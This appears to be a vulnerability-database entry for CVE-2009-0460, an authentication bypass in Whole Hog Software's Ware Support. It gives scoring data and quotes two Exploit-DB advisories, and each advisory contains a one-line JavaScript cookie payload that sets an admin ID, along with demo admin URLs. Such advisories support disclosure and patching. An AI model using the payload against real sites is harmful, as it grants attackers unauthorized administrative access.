CVE-2009-0460
Published: 2009-02-10
CVE-2009-0460: Whole Hog Ware Support 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.
Priority: P3 · 51 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.83% (84.9th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wholehogsoftware | ware_support | — | — |
No detection rules found.
Exploit-DB
WholeHogSoftware Ware Support - Insecure Cookie Handling
exploitdb·2009-02-03
CVE-2009-0461 WholeHogSoftware Ware Support - Insecure Cookie Handling
---
###########################################################################
[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability
[+] Script :Ware Support
[+] Site :http://wholehogsoftware.com
[+] Detay :http://wholehogsoftware.com/index.php/page/ware_support
[+] Discovered By Mountassif Moad
[+] www.v4-team.com
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/support/admin/
# milw0rm.com [2009-02-03]
Exploit-DB
WholeHogSoftware Password Protect - Insecure Cookie Handling
exploitdb·2009-02-03
CVE-2009-0461 WholeHogSoftware Password Protect - Insecure Cookie Handling
---
###########################################################################
[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability
[+] Script :Password Protect
[+] Site :http://wholehogsoftware.com
[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
[+] Discovered By Mountassif Moad
[+] www.v4-team.com
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin
# milw0rm.com [2009-02-03]
No writeups or analysis indexed.